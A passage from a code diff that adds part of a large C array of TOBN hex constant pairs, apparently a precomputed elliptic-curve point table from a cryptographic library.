+     TOBN(0x1221aef6, 0x70e08128), TOBN(0xe62d8c51, 0x4acb6b16),
+     TOBN(0x71f64a67, 0x379e7896), TOBN(0xb25237a2, 0xcafd7fa5),
+     TOBN(0xf077bd98, 0x3841ba6a), TOBN(0xc4ac0244, 0x3cd16e7e),
+     TOBN(0x548ba869, 0x21fea4ca), TOBN(0xd36d0817, 0xf3dfdac1),
+     TOBN(0x09d8d71f, 0xf4685faf), TOBN(0x8eff66be, 0xc52c459a),
+     TOBN(0x182faee7, 0x0b57235e), TOBN(0xee3c39b1, 0x0106712b),
+     TOBN(0x5107331f, 0xc0fcdcb0), TOBN(0x669fb9dc, 0xa51054ba),
+     TOBN(0xb25101fb, 0x319d7682), TOBN(0xb0293129, 0x0a982fee),
+     TOBN(0x51c1c9b9, 0x0261b344), TOBN(0x0e008c5b, 0xbfd371fa),
+     TOBN(0xd866dd1c, 0x0278ca33), TOBN(0x666f76a6, 0xe5aa53b1),
+     TOBN(0xe5cfb779, 0x6013a2cf), TOBN(0x1d3a1aad, 0xa3521836),
+     TOBN(0xcedd2531, 0x73faa485), TOBN(0xc8ee6c4f, 0xc0a76878),
+     TOBN(0xddbccfc9, 0x2a11667d), TOBN(0x1a418ea9, 0x1c2f695a),
+     TOBN(0xdb11bd92, 0x51f73971), TOBN(0x3e4b3c82, 0xda2ed89f),
+     TOBN(0x9a44f3f4, 0xe73e0319), TOBN(0xd1e3de0f, 0x303431af),
+     TOBN(0x3c5604ff, 0x50f75f9c), TOBN(0x1d8eddf3, 0x7e752b22),
+     TOBN(0x0ef074dd, 0x3c9a1118), TOBN(0xd0ffc172, 0xccb86d7b),
+     TOBN(0xabd1ece3, 0x037d90f2), TOBN(0xe3f307d6, 0x6055856c),
+     TOBN(0x422f9328, 0x7e4c6daf), TOBN(0x902aac66, 0x334879a0),
+     TOBN(0xb6a1e7bf, 0x94cdfade), TOBN(0x6c97e1ed, 0x7fc6d634),
+     TOBN(0x662ad24d, 0xa2fb63f8), TOBN(0xf81be1b9, 0xa5928405),
+     TOBN(0x86d765e4, 0xd14b4206), TOBN(0xbecc2e0e, 0x8fa0db65),
+     TOBN(0xa28838e0, 0xb17fc76c), TOBN(0xe49a602a, 0xe37cf24e),
+     TOBN(0x76b4131a, 0x567193ec), TOBN(0xaf3c305a, 0xe5f6e70b),
+     TOBN(0x9587bd39, 0x031eebdd), TOBN(0x5709def8, 0x71bbe831),
+     TOBN(0x57059983, 0x0eb2b669), TOBN(0x4d80ce1b, 0x875b7029),
+     TOBN(0x838a7da8, 0x0364ac16), TOBN(0x2f431d23, 0xbe1c83ab),
+     TOBN(0xe56812a6, 0xf9294dd3), TOBN(0xb448d01f, 0x9b4b0d77),
+     TOBN(0xf3ae6061, 0x04e8305c), TOBN(0x2bead645, 0x94d8c63e),
+     TOBN(0x0a85434d, 0x84fd8b07), TOBN(0x537b983f, 0xf7a9dee5),
+     TOBN(0xedcc5f18, 0xef55bd85), TOBN(0x2041af62, 0x21c6cf8b),
+     TOBN(0x8e52874c, 0xb940c71e), TOBN(0x211935a9, 0xdb5f4b3a),
+     TOBN(0x94350492, 0x301b1dc3), TOBN(0x33d2646d, 0x29958620),
+     TOBN(0x16b0d64b, 0xef911404), TOBN(0x9d1f25ea, 0x9a3c5ef4),
+     TOBN(0x20f200eb, 0x4a352c78), TOBN(0x43929f2c, 0x4bd0b428),
+     TOBN(0xa5656667, 0xc7196e29), TOBN(0x7992c2f0, 0x9391be48),
+     TOBN(0xaaa97cbd, 0x9ee0cd6e), TOBN(0x51b0310c, 0x3dc8c9bf),
+     TOBN(0x237f8acf, 0xdd9f22cb), TOBN(0xbb1d81a1, 0xb585d584),
+     TOBN(0x8d5d85f5, 0x8c416388), TOBN(0x0d6e5a5a, 0x42fe474f),
+     TOBN(0xe7812766, 0x38235d4e), TOBN(0x1c62bd67, 0x496e3298),
+     TOBN(0x8378660c, 0x3f175bc8), TOBN(0x4d04e189, 0x17afdd4d),
+     TOBN(0x32a81601, 0x85a8068c), TOBN(0xdb58e4e1, 0x92b29a85),
+     TOBN(0xe8a65b86, 0xc70d8a3b), TOBN(0x5f0e6f4e, 0x98a0403b),
+     TOBN(0x08129684, 0x69ed2370), TOBN(0x34dc30bd, 0x0871ee26),
+     TOBN(0x3a5ce948, 0x7c9c5b05), TOBN(0x7d487b80, 0x43a90c87),
+     TOBN(0x4089ba37, 0xdd0e7179), TOBN(0x45f80191, 0xb4041811),
+     TOBN(0x1c3e1058, 0x98747ba5), TOBN(0x98c4e13a, 0x6e1ae592),
+     TOBN(0xd44636e6, 0xe82c9f9e), TOBN(0x711db87c, 0xc33a1043),
+     TOBN(0x6f431263, 0xaa8aec05), TOBN(0x43ff120d, 0x2744a4aa),
+     TOBN(0xd3bd892f, 0xae77779b), TOBN(0xf0fe0cc9, 0x8cdc9f82),
+     TOBN(0xca5f7fe6, 0xf1c5b1bc), TOBN(0xcc63a682, 0x44929a72),
+     TOBN(0xc7eaba0c, 0x09dbe19a), TOBN(0x2f3585ad, 0x6b5c73c2),
+     TOBN(0x8ab8924b, 0x0ae50c30), TOBN(0x17fcd27a, 0x638b30ba),
+     TOBN(0xaf414d34, 0x10b3d5a5), TOBN(0x09c107d2, 0x2a9accf1),
+     TOBN(0x15dac49f, 0x946a6242), TOBN(0xaec3df2a, 0xd707d642),
+     TOBN(0x2c2492b7, 0x3f894ae0), TOBN(0xf59df3e5, 0xb75f18ce),
+     TOBN(0x7cb740d2, 0x8f53cad0), TOBN(0x3eb585fb, 0xc4f01294),
+     TOBN(0x17da0c86, 0x32c7f717), TOBN(0xeb8c795b, 0xaf943f4c),
+     TOBN(0x4ee23fb5, 0xf67c51d2), TOBN(0xef187575, 0x68889949),
+     TOBN(0xa6b4bdb2, 0x0389168b), TOBN(0xc4ecd258, 0xea577d03),
+     TOBN(0x3a63782b, 0x55743082), TOBN(0x6f678f4c, 0xc72f08cd),
+     TOBN(0x553511cf, 0x65e58dd8), TOBN(0xd53b4e3e, 0xd402c0cd),
+     TOBN(0x37de3e29, 0xa037c14c), TOBN(0x86b6c516, 0xc05712aa),
+     TOBN(0x2834da3e, 0xb38dff6f), TOBN(0xbe012c52, 0xea636be8),
+     TOBN(0x292d238c, 0x61dd37f8), TOBN(0x0e54523f, 0x8f8142db),
+     TOBN(0xe31eb436, 0x036a05d8), TOBN(0x83e3cdff, 0x1e93c0ff),
+     TOBN(0x3fd2fe0f, 0x50821ddf), TOBN(0xc8e19b0d, 0xff9eb33b),
+     TOBN(0xc8cc943f, 0xb569a5fe), TOBN(0xad0090d4, 0xd4342d75),
+     TOBN(0x82090b4b, 0xcaeca000), TOBN(0xca39687f, 0x1bd410eb),
+     TOBN(0xe7bb0df7, 0x65959d77), TOBN(0x39d78218, 0x9c964999),
+     TOBN(0xd87f62e8, 0xb2415451), TOBN(0xe5efb774, 0xbed76108),
+     TOBN(0x3ea011a4, 0xe822f0d0), TOBN(0xbc647ad1, 0x5a8704f8),
+     TOBN(0xbb315b35, 0x50c6820f), TOBN(0x863dec3d, 0xb7e76bec),
+     TOBN(0x01ff5d3a, 0xf017bfc7), TOBN(0x20054439, 0x976b8229),
+     TOBN(0x067fca37, 0x0bbd0d3b), TOBN(0xf63dde64, 0x7f5e3d0f),
+     TOBN(0x22dbefb3, 0x2a4c94e9), TOBN(0xafbff0fe, 0x96f8278a),
+     TOBN(0x80aea0b1, 0x3503793d), TOBN(0xb2238029, 0x5f06cd29),
+     TOBN(0x65703e57, 0x8ec3feca), TOBN(0x06c38314, 0x393e7053),
+     TOBN(0xa0b751eb, 0x7c6734c4), TOBN(0xd2e8a435, 0xc59f0f1e),
+     TOBN(0x147d9052, 0x5e9ca895), TOBN(0x2f4dd31e, 0x972072df),
+     TOBN(0xa16fda8e, 0xe6c6755c), TOBN(0xc66826ff, 0xcf196558),
+     TOBN(0x1f1a76a3, 0x0cf43895), TOBN(0xa9d604e0, 0x83c3097b),
+     TOBN(0xe1908309, 0x66390e0e), TOBN(0xa50bf753, 0xb3c85eff),
+     TOBN(0x0696bdde, 0xf6a70251), TOBN(0x548b801b, 0x3c6ab16a),
+     TOBN(0x37fcf704, 0xa4d08762), TOBN(0x090b3def, 0xdff76c4e),
+     TOBN(0x87e8cb89, 0x69cb9158), TOBN(0x44a90744, 0x995ece43),
+     TOBN(0xf85395f4, 0x0ad9fbf5), TOBN(0x49b0f6c5, 0x4fb0c82d),
+     TOBN(0x75d9bc15, 0xadf7cccf), TOBN(0x81a3e5d6, 0xdfa1e1b0),
+     TOBN(0x8c39e444, 0x249bc17e), TOBN(0xf37dccb2, 0x8ea7fd43),
+     TOBN(0xda654873, 0x907fba12), TOBN(0x35daa6da, 0x4a372904),
+     TOBN(0x0564cfc6, 0x6283a6c5), TOBN(0xd09fa4f6, 0x4a9395bf),
+     TOBN(0x688e9ec9, 0xaeb19a36), TOBN(0xd913f1ce, 0xc7bfbfb4),
+     TOBN(0x797b9a3c, 0x61c2faa6), TOBN(0x2f979bec, 0x6a0a9c12),
+     TOBN(0xb5969d0f, 0x359679ec), TOBN(0xebcf523d, 0x079b0460),
+     TOBN(0xfd6b0008, 0x10fab870), TOBN(0x3f2edcda, 0x9373a39c),
+     TOBN(0x0d64f9a7, 0x6f568431), TOBN(0xf848c27c, 0x02f8898c),
+     TOBN(0xf418ade1, 0x260b5bd5), TOBN(0xc1f3e323, 0x6973dee8),
+     TOBN(0x46e9319c, 0x26c185dd), TOBN(0x6d85b7d8, 0x546f0ac4),
+     TOBN(0x427965f2, 0x247f9d57), TOBN(0xb519b636, 0xb0035f48),
+     TOBN(0x6b6163a9, 0xab87d59c), TOBN(0xff9f58c3, 0x39caaa11),
+     TOBN(0x4ac39cde, 0x3177387b), TOBN(0x5f6557c2, 0x873e77f9),
+     TOBN(0x67504006, 0x36a83041), TOBN(0x9b1c96ca, 0x75ef196c),
+     TOBN(0xf34283de, 0xb08c7940), TOBN(0x7ea09644, 0x1128c316),
+     TOBN(0xb510b3b5, 0x6aa39dff), TOBN(0x59b43da2, 0x9f8e4d8c),
+     TOBN(0xa8ce31fd, 0x9e4c4b9f), TOBN(0x0e20be26, 0xc1303c01),
+     TOBN(0x18187182, 0xe8ee47c9), TOBN(0xd9687cdb, 0x7db98101),
+     TOBN(0x7a520e4d, 0xa1e14ff6), TOBN(0x429808ba, 0x8836d572),
+     TOBN(0xa37ca60d, 0x4944b663), TOBN(0xf901f7a9, 0xa3f91ae5),
+     TOBN(0xe4e3e76e, 0x9e36e3b1), TOBN(0x9aa219cf, 0x29d93250),
+     TOBN(0x347fe275, 0x056a2512), TOBN(0xa4d643d9, 0xde65d95c),
+     TOBN(0x9669d396, 0x699fc3ed), TOBN(0xb598dee2, 0xcf8c6bbe),
+     TOBN(0x682ac1e5, 0xdda9e5c6), TOBN(0x4e0d3c72, 0xcaa9fc95),
+     TOBN(0x17faaade, 0x772bea44), TOBN(0x5ef8428c, 0xab0009c8),
+     TOBN(0xcc4ce47a, 0x460ff016), TOBN(0xda6d12bf, 0x725281cb),
+     TOBN(0x44c67848, 0x0223aad2), TOBN(0x6e342afa, 0x36256e28),
+     TOBN(0x1400bb0b, 0x93a37c04), TOBN(0x62b1bc9b, 0xdd10bd96),
+     TOBN(0x7251adeb, 0x0dac46b7), TOBN(0x7d33b92e, 0x7be4ef51),
+     TOBN(0x28b2a94b, 0xe61fa29a), TOBN(0x4b2be13f, 0x06422233),
+     TOBN(0x36d6d062, 0x330d8d37), TOBN(0x5ef80e1e, 0xb28ca005),
+     TOBN(0x174d4699, 0x6d16768e), TOBN(0x9fc4ff6a, 0x628bf217),
+     TOBN(0x77705a94, 0x154e490d), TOBN(0x9d96dd28, 0x8d2d997a),
+     TOBN(0x77e2d9d8, 0xce5d72c4), TOBN(0x9d06c5a4, 0xc11c714f),
+     TOBN(0x02aa5136, 0x79e4a03e), TOBN(0x1386b3c2, 0x030ff28b),
+     TOBN(0xfe82e8a6, 0xfb283f61), TOBN(0x7df203e5, 0xf3abc3fb),
+     TOBN(0xeec7c351, 0x3a4d3622), TOBN(0xf7d17dbf, 0xdf762761),
+     TOBN(0xc3956e44, 0x522055f0), TOBN(0xde3012db, 0x8fa748db),
+     TOBN(0xca9fcb63, 0xbf1dcc14), TOBN(0xa56d9dcf, 0xbe4e2f3a),
+     TOBN(0xb86186b6, 0x8bcec9c2), TOBN(0x7cf24df9, 0x680b9f06),
+     TOBN(0xc46b45ea, 0xc0d29281), TOBN(0xfff42bc5, 0x07b10e12),
+     TOBN(0x12263c40, 0x4d289427), TOBN(0x3d5f1899, 0xb4848ec4),
+     TOBN(0x11f97010, 0xd040800c), TOBN(0xb4c5f529, 0x300feb20),
+     TOBN(0xcc543f8f, 0xde94fdcb), TOBN(0xe96af739, 0xc7c2f05e),
+     TOBN(0xaa5e0036, 0x882692e1), TOBN(0x09c75b68, 0x950d4ae9),
+     TOBN(0x62f63df2, 0xb5932a7a), TOBN(0x2658252e, 0xde0979ad),
+     TOBN(0x2a19343f, 0xb5e69631), TOBN(0x718c7501, 0x525b666b),
+     TOBN(0x26a42d69, 0xea40dc3a), TOBN(0xdc84ad22, 0xaecc018f),
+     TOBN(0x25c36c7b, 0x3270f04a), TOBN(0x46ba6d47, 0x50fa72ed),
+     TOBN(0x6c37d1c5, 0x93e58a8e), TOBN(0xa2394731, 0x120c088c),
+     TOBN(0xc3be4263, 0xcb6e86da), TOBN(0x2c417d36, 0x7126d038),
+     TOBN(0x5b70f9c5, 0x8b6f8efa), TOBN(0x671a2faa, 0x37718536),
+     TOBN(0xd3ced3c6, 0xb539c92b), TOBN(0xe56f1bd9, 0xa31203c2),
+     TOBN(0x8b096ec4, 0x9ff3c8eb), TOBN(0x2deae432, 0x43491cea),
+     TOBN(0x2465c6eb, 0x17943794), TOBN(0x5d267e66, 0x20586843),
+     TOBN(0x9d3d116d, 0xb07159d0), TOBN(0xae07a67f, 0xc1896210),
+     TOBN(0x8fc84d87, 0xbb961579), TOBN(0x30009e49, 0x1c1f8dd6),
+     TOBN(0x8a8caf22, 0xe3132819), TOBN(0xcffa197c, 0xf23ab4ff),
+     TOBN(0x58103a44, 0x205dd687), TOBN(0x57b796c3, 0x0ded67a2),
+     TOBN(0x0b9c3a6c, 0xa1779ad7), TOBN(0xa33cfe2e, 0x357c09c5),
+     TOBN(0x2ea29315, 0x3db4a57e), TOBN(0x91959695, 0x8ebeb52e),
+     TOBN(0x118db9a6, 0xe546c879), TOBN(0x8e996df4, 0x6295c8d6),
+     TOBN(0xdd990484, 0x55ec806b), TOBN(0x24f291ca, 0x165c1035),
+     TOBN(0xcca523bb, 0x440e2229), TOBN(0x324673a2, 0x73ef4d04),
+     TOBN(0xaf3adf34, 0x3e11ec39), TOBN(0x6136d7f1, 0xdc5968d3),
+     TOBN(0x7a7b2899, 0xb053a927), TOBN(0x3eaa2661, 0xae067ecd),
+     TOBN(0x8549b9c8, 0x02779cd9), TOBN(0x061d7940, 0xc53385ea),
+     TOBN(0x3e0ba883, 0xf06d18bd), TOBN(0x4ba6de53, 0xb2700843),
+     TOBN(0xb966b668, 0x591a9e4d), TOBN(0x93f67567, 0x7f4fa0ed),
+     TOBN(0x5a02711b, 0x4347237b), TOBN(0xbc041e2f, 0xe794608e),
+     TOBN(0x55af10f5, 0x70f73d8c), TOBN(0xd2d4d4f7, 0xbb7564f7),
+     TOBN(0xd7d27a89, 0xb3e93ce7), TOBN(0xf7b5a875, 0x5d3a2c1b),
+     TOBN(0xb29e68a0, 0x255b218a), TOBN(0xb533837e, 0x8af76754),
+     TOBN(0xd1b05a73, 0x579fab2e), TOBN(0xb41055a1, 0xecd74385),
+     TOBN(0xb2369274, 0x445e9115), TOBN(0x2972a7c4, 0xf520274e),
+     TOBN(0x6c08334e, 0xf678e68a), TOBN(0x4e4160f0, 0x99b057ed),
+     TOBN(0x3cfe11b8, 0x52ccb69a), TOBN(0x2fd1823a, 0x21c8f772),
+     TOBN(0xdf7f072f, 0x3298f055), TOBN(0x8c0566f9, 0xfec74a6e),
+     TOBN(0xe549e019, 0x5bb4d041), TOBN(0x7c3930ba, 0x9208d850),
+     TOBN(0xe07141fc, 0xaaa2902b), TOBN(0x539ad799, 0xe4f69ad3),
+     TOBN(0xa6453f94, 0x813f9ffd), TOBN(0xc58d3c48, 0x375bc2f7),
+     TOBN(0xb3326fad, 0x5dc64e96), TOBN(0x3aafcaa9, 0xb240e354),
+     TOBN(0x1d1b0903, 0xaca1e7a9), TOBN(0x4ceb9767, 0x1211b8a0),
+     TOBN(0xeca83e49, 0xe32a858e), TOBN(0x4c32892e, 0xae907bad),
+     TOBN(0xd5b42ab6, 0x2eb9b494), TOBN(0x7fde3ee2, 0x1eabae1b),
+     TOBN(0x13b5ab09, 0xcaf54957), TOBN(0xbfb028be, 0xe5f5d5d5),
+     TOBN(0x928a0650, 0x2003e2c0), TOBN(0x90793aac, 0x67476843),
+     TOBN(0x5e942e79, 0xc81710a0), TOBN(0x557e4a36, 0x27ccadd4),
+     TOBN(0x72a2bc56, 0x4bcf6d0c), TOBN(0x09ee5f43, 0x26d7b80c),
+     TOBN(0x6b70dbe9, 0xd4292f19), TOBN(0x56f74c26, 0x63f16b18),
+     TOBN(0xc23db0f7, 0x35fbb42a), TOBN(0xb606bdf6, 0x6ae10040),
+     TOBN(0x1eb15d4d, 0x044573ac), TOBN(0x7dc3cf86, 0x556b0ba4),
+     TOBN(0x97af9a33, 0xc60df6f7), TOBN(0x0b1ef85c, 0xa716ce8c),
+     TOBN(0x2922f884, 0xc96958be), TOBN(0x7c32fa94, 0x35690963),
+     TOBN(0x2d7f667c, 0xeaa00061), TOBN(0xeaaf7c17, 0x3547365c),
+     TOBN(0x1eb4de46, 0x87032d58), TOBN(0xc54f3d83, 0x5e2c79e0),
+     TOBN(0x07818df4, 0x5d04ef23), TOBN(0x55faa9c8, 0x673d41b4),
+     TOBN(0xced64f6f, 0x89b95355), TOBN(0x4860d2ea, 0xb7415c84),
+     TOBN(0x5fdb9bd2, 0x050ebad3), TOBN(0xdb53e0cc, 0x6685a5bf),
+     TOBN(0xb830c031, 0x9feb6593), TOBN(0xdd87f310, 0x6accff17),
+     TOBN(0x2303ebab, 0x9f555c10), TOBN(0x94603695, 0x287e7065),
+     TOBN(0xf88311c3, 0x2e83358c), TOBN(0x508dd9b4, 0xeefb0178),
+     TOBN(0x7ca23706, 0x2dba8652), TOBN(0x62aac5a3, 0x0047abe5),
+     TOBN(0x9a61d2a0, 0x8b1ea7b3), TOBN(0xd495ab63, 0xae8b1485),
+     TOBN(0x38740f84, 0x87052f99), TOBN(0x178ebe5b, 0xb2974eea),
+     TOBN(0x030bbcca, 0x5b36d17f), TOBN(0xb5e4cce3, 0xaaf86eea),
+     TOBN(0xb51a0220, 0x68f8e9e0), TOBN(0xa4348796, 0x09eb3e75),
+     TOBN(0xbe592309, 0xeef1a752), TOBN(0x5d7162d7, 0x6f2aa1ed),
+     TOBN(0xaebfb5ed, 0x0f007dd2), TOBN(0x255e14b2, 0xc89edd22),
+     TOBN(0xba85e072, 0x0303b697), TOBN(0xc5d17e25, 0xf05720ff),
+     TOBN(0x02b58d6e, 0x5128ebb6), TOBN(0x2c80242d, 0xd754e113),
+     TOBN(0x919fca5f, 0xabfae1ca), TOBN(0x937afaac, 0x1a21459b),
+     TOBN(0x9e0ca91c, 0x1f66a4d2), TOBN(0x194cc7f3, 0x23ec1331),
+     TOBN(0xad25143a, 0x8aa11690), TOBN(0xbe40ad8d, 0x09b59e08),
+     TOBN(0x37d60d9b, 0xe750860a), TOBN(0x6c53b008, 0xc6bf434c),
+     TOBN(0xb572415d, 0x1356eb80), TOBN(0xb8bf9da3, 0x9578ded8),
+     TOBN(0x22658e36, 0x5e8fb38b), TOBN(0x9b70ce22, 0x5af8cb22),
+     TOBN(0x7c00018a, 0x829a8180), TOBN(0x84329f93, 0xb81ed295),
+     TOBN(0x7c343ea2, 0x5f3cea83), TOBN(0x38f8655f, 0x67586536),
+     TOBN(0xa661a0d0, 0x1d3ec517), TOBN(0x98744652, 0x512321ae),
+     TOBN(0x084ca591, 0xeca92598), TOBN(0xa9bb9dc9, 0x1dcb3feb),
+     TOBN(0x14c54355, 0x78b4c240), TOBN(0x5ed62a3b, 0x610cafdc),
+     TOBN(0x07512f37, 0x1b38846b), TOBN(0x571bb70a, 0xb0e38161),
+     TOBN(0xb556b95b, 0x2da705d2), TOBN(0x3ef8ada6, 0xb1a08f98),
+     TOBN(0x85302ca7, 0xddecfbe5), TOBN(0x0e530573, 0x943105cd),
+     TOBN(0x60554d55, 0x21a9255d), TOBN(0x63a32fa1, 0xf2f3802a),
+     TOBN(0x35c8c5b0, 0xcd477875), TOBN(0x97f458ea, 0x6ad42da1),
+     TOBN(0x832d7080, 0xeb6b242d), TOBN(0xd30bd023, 0x3b71e246),
+     TOBN(0x7027991b, 0xbe31139d), TOBN(0x68797e91, 0x462e4e53),
+     TOBN(0x423fe20a, 0x6b4e185a), TOBN(0x82f2c67e, 0x42d9b707),
+     TOBN(0x25c81768, 0x4cf7811b), TOBN(0xbd53005e, 0x045bb95d),}
+    ,
+    {TOBN(0xe5f649be, 0x9d8e68fd), TOBN(0xdb0f0533, 0x1b044320),
+     TOBN(0xf6fde9b3, 0xe0c33398), TOBN(0x92f4209b, 0x66c8cfae),
+     TOBN(0xe9d1afcc, 0x1a739d4b), TOBN(0x09aea75f, 0xa28ab8de),
+     TOBN(0x14375fb5, 0xeac6f1d0), TOBN(0x6420b560, 0x708f7aa5),
+     TOBN(0x9eae499c, 0x6254dc41), TOBN(0x7e293924, 0x7a837e7e),
+     TOBN(0x74aec08c, 0x090524a7), TOBN(0xf82b9219, 0x8d6f55f2),
+     TOBN(0x493c962e, 0x1402cec5), TOBN(0x9f17ca17, 0xfa2f30e7),
+     TOBN(0xbcd783e8, 0xe9b879cb), TOBN(0xea3d8c14, 0x5a6f145f),
+     TOBN(0xdede15e7, 0x5e0dee6e), TOBN(0x74f24872, 0xdc628aa2),
+     TOBN(0xd3e9c4fe, 0x7861bb93), TOBN(0x56d4822a, 0x6187b2e0),
+     TOBN(0xb66417cf, 0xc59826f9), TOBN(0xca260969, 0x2408169e),
+     TOBN(0xedf69d06, 0xc79ef885), TOBN(0x00031f8a, 0xdc7d138f),
+     TOBN(0x103c46e6, 0x0ebcf726), TOBN(0x4482b831, 0x6231470e),
+     TOBN(0x6f6dfaca, 0x487c2109), TOBN(0x2e0ace97, 0x62e666ef),
+     TOBN(0x3246a9d3, 0x1f8d1f42), TOBN(0x1b1e83f1, 0x574944d2),
+     TOBN(0x13dfa63a, 0xa57f334b), TOBN(0x0cf8daed, 0x9f025d81),
+     TOBN(0x30d78ea8, 0x00ee11c1), TOBN(0xeb053cd4, 0xb5e3dd75),
+     TOBN(0x9b65b13e, 0xd58c43c5), TOBN(0xc3ad49bd, 0xbd151663),
+     TOBN(0x99fd8e41, 0xb6427990), TOBN(0x12cf15bd, 0x707eae1e),
+     TOBN(0x29ad4f1b, 0x1aabb71e), TOBN(0x5143e74d, 0x07545d0e),
+     TOBN(0x30266336, 0xc88bdee1), TOBN(0x25f29306, 0x5876767c),
+     TOBN(0x9c078571, 0xc6731996), TOBN(0xc88690b2, 0xed552951),
+     TOBN(0x274f2c2d, 0x852705b4), TOBN(0xb0bf8d44, 0x4e09552d),
+     TOBN(0x7628beeb, 0x986575d1), TOBN(0x407be238, 0x7f864651),
+     TOBN(0x0e5e3049, 0xa639fc6b), TOBN(0xe75c35d9, 0x86003625),
+     TOBN(0x0cf35bd8, 0x5dcc1646), TOBN(0x8bcaced2, 0x6c26273a),
+     TOBN(0xe22ecf1d, 0xb5536742), TOBN(0x013dd897, 0x1a9e068b),
+     TOBN(0x17f411cb, 0x8a7909c5), TOBN(0x5757ac98, 0x861dd506),
+     TOBN(0x85de1f0d, 0x1e935abb), TOBN(0xdefd10b4, 0x154de37a),
+     TOBN(0xb8d9e392, 0x369cebb5), TOBN(0x54d5ef9b, 0x761324be),
+     TOBN(0x4d6341ba, 0x74f17e26), TOBN(0xc0a0e3c8, 0x78c1dde4),
+     TOBN(0xa6d77581, 0x87d918fd), TOBN(0x66876015, 0x02ca3a13),
+     TOBN(0xc7313e9c, 0xf36658f0), TOBN(0xc433ef1c, 0x71f8057e),
+     TOBN(0x85326246, 0x1b6a835a), TOBN(0xc8f05398, 0x7c86394c),
+     TOBN(0xff398cdf, 0xe983c4a1), TOBN(0xbf5e8162, 0x03b7b931),
+     TOBN(0x93193c46, 0xb7b9045b), TOBN(0x1e4ebf5d, 0xa4a6e46b),
+     TOBN(0xf9942a60, 0x43a24fe7), TOBN(0x29c1191e, 0xffb3492b),
+     TOBN(0x9f662449, 0x902fde05), TOBN(0xc792a7ac, 0x6713c32d),
+     TOBN(0x2fd88ad8, 0xb737982c), TOBN(0x7e3a0319, 0xa21e60e3),
+     TOBN(0x09b0de44, 0x7383591a), TOBN(0x6df141ee, 0x8310a456),
+     TOBN(0xaec1a039, 0xe6d6f471), TOBN(0x14b2ba0f, 0x1198d12e),
+     TOBN(0xebc1a160, 0x3aeee5ac), TOBN(0x401f4836, 0xe0b964ce),
+     TOBN(0x2ee43796, 0x4fd03f66), TOBN(0x3fdb4e49, 0xdd8f3f12),
+     TOBN(0x6ef267f6, 0x29380f18), TOBN(0x3e8e9670, 0x8da64d16),
+     TOBN(0xbc19180c, 0x207674f1), TOBN(0x112e09a7, 0x33ae8fdb),
+     TOBN(0x99667554, 0x6aaeb71e), TOBN(0x79432af1, 0xe101b1c7),
+     TOBN(0xd5eb558f, 0xde2ddec6), TOBN(0x81392d1f, 0x5357753f),
+     TOBN(0xa7a76b97, 0x3ae1158a), TOBN(0x416fbbff, 0x4a899991),
+     TOBN(0x9e65fdfd, 0x0d4a9dcf), TOBN(0x7bc29e48, 0x944ddf12),
+     TOBN(0xbc1a92d9, 0x3c856866), TOBN(0x273c6905, 0x6e98dfe2),
+     TOBN(0x69fce418, 0xcdfaa6b8), TOBN(0x606bd823, 0x5061c69f),
+     TOBN(0x42d495a0, 0x6af75e27), TOBN(0x8ed3d505, 0x6d873a1f),
+     TOBN(0xaf552841, 0x6ab25b6a), TOBN(0xc6c0ffc7, 0x2b1a4523),
+     TOBN(0xab18827b, 0x21c99e03), TOBN(0x060e8648, 0x9034691b),
+     TOBN(0x5207f90f, 0x93c7f398), TOBN(0x9f4a96cb, 0x82f8d10b),
+     TOBN(0xdd71cd79, 0x3ad0f9e3), TOBN(0x84f435d2, 0xfc3a54f5),
+     TOBN(0x4b03c55b, 0x8e33787f), TOBN(0xef42f975, 0xa6384673),
+     TOBN(0xff7304f7, 0x5051b9f0), TOBN(0x18aca1dc, 0x741c87c2),
+     TOBN(0x56f120a7, 0x2d4bfe80), TOBN(0xfd823b3d, 0x053e732c),
+     TOBN(0x11bccfe4, 0x7537ca16), TOBN(0xdf6c9c74, 0x1b5a996b),
+     TOBN(0xee7332c7, 0x904fc3fa), TOBN(0x14a23f45, 0xc7e3636a),
+     TOBN(0xc38659c3, 0xf091d9aa), TOBN(0x4a995e5d, 0xb12d8540),
+     TOBN(0x20a53bec, 0xf3a5598a), TOBN(0x56534b17, 0xb1eaa995),
+     TOBN(0x9ed3dca4, 0xbf04e03c), TOBN(0x716c563a, 0xd8d56268),
+     TOBN(0x27ba77a4, 0x1d6178e7), TOBN(0xe4c80c40, 0x68a1ff8e),
+     TOBN(0x75011099, 0x0a13f63d), TOBN(0x7bf33521, 0xa61d46f3),
+     TOBN(0x0aff218e, 0x10b365bb), TOBN(0x81021804, 0x0fd7ea75),
+     TOBN(0x05a3fd8a, 0xa4b3a925), TOBN(0xb829e75f, 0x9b3db4e6),
+     TOBN(0x6bdc75a5, 0x4d53e5fb), TOBN(0x04a5dc02, 0xd52717e3),
+     TOBN(0x86af502f, 0xe9a42ec2), TOBN(0x8867e8fb, 0x2630e382),
+     TOBN(0xbf845c6e, 0xbec9889b), TOBN(0x54f491f2, 0xcb47c98d),
+     TOBN(0xa3091fba, 0x790c2a12), TOBN(0xd7f6fd78, 0xc20f708b),
+     TOBN(0xa569ac30, 0xacde5e17), TOBN(0xd0f996d0, 0x6852b4d7),
+     TOBN(0xe51d4bb5, 0x4609ae54), TOBN(0x3fa37d17, 0x0daed061),
+     TOBN(0x62a88684, 0x34b8fb41), TOBN(0x99a2acbd, 0x9efb64f1),
+     TOBN(0xb75c1a5e, 0x6448e1f2), TOBN(0xfa99951a, 0x42b5a069),
+     TOBN(0x6d956e89, 0x2f3b26e7), TOBN(0xf4709860, 0xda875247),
+     TOBN(0x3ad15179, 0x2482dda3), TOBN(0xd64110e3, 0x017d82f0),
+     TOBN(0x14928d2c, 0xfad414e4), TOBN(0x2b155f58, 0x2ed02b24),
+     TOBN(0x481a141b, 0xcb821bf1), TOBN(0x12e3c770, 0x4f81f5da),
+     TOBN(0xe49c5de5, 0x9fff8381), TOBN(0x11053232, 0x5bbec894),
+     TOBN(0xa0d051cc, 0x454d88c4), TOBN(0x4f6db89c, 0x1f8e531b),
+     TOBN(0x34fe3fd6, 0xca563a44), TOBN(0x7f5c2215, 0x58da8ab9),
+     TOBN(0x8445016d, 0x9474f0a1), TOBN(0x17d34d61, 0xcb7d8a0a),
+     TOBN(0x8e9d3910, 0x1c474019), TOBN(0xcaff2629, 0xd52ceefb),
+     TOBN(0xf9cf3e32, 0xc1622c2b), TOBN(0xd4b95e3c, 0xe9071a05),
+     TOBN(0xfbbca61f, 0x1594438c), TOBN(0x1eb6e6a6, 0x04aadedf),
+     TOBN(0x853027f4, 0x68e14940), TOBN(0x221d322a, 0xdfabda9c),
+     TOBN(0xed8ea9f6, 0xb7cb179a), TOBN(0xdc7b764d, 0xb7934dcc),
